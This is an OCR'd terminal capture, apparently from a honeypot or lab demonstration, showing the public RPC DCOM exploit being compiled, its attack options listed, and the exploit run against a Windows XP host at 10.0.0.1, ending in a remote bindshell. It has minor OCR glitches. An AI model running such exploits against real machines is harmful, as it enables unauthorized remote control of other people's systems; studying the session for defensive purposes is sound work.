File Edit View Terminal Tabs Help |
root@honeypot Scripts# gcc -o dcom_exploit ocl92-dcom.c ocl92-dcom.c: In function 'main':
ocl92-dcom.c:295: warning: comparison is always false due to limited rangę of data type
ocl92-dcom.c:303: warning: comparison is always false due to limited rangę of data type
root@honeypot Scripts# Is -l dcom_exploit
-rwxr-xr-x 1 root root 14223 Feb 24 11:20 dco«_exploit
root@honeypot Scripts# ./dcom_exploit
RPC DCOM exploit coded by .:[ocl92.us):. Security
Usage:
./dcom_exploit -d <host> [options]
Options:
-d: Hostname to attack [Required]
-t: Type [Default: O]
-r: Return address [Default: Selected from target]
-p: Attack port [Default: 135]
-l: Bindshell port [Default: 666]
Types:
0 [0x0018759f]: [Win2k-Universal]
1 [0x0100139d]: [WinXP-Universal]
root@honeypot Scripts# ./dcom_exploit -d 10.0.0.1 -t 1 -l 4445 RPC DCOM remote exploit - .:[ocl92.us]:. Security [+] Resolving host. .
[+] Done.
--Target: [WinXP-Universal):10.O.O.1:135, Bindshell:4445, RET=[0x0100139d]
[+] Connected to bindshell..
-- bling bling --
Microsoft Windows XP [Wersja 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>exit exit root@honeypot Scripts# [